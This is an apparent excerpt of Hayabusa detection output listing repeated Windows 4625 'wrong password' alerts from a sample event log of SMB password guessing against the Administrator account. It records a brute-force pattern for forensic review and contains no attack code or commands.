NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: 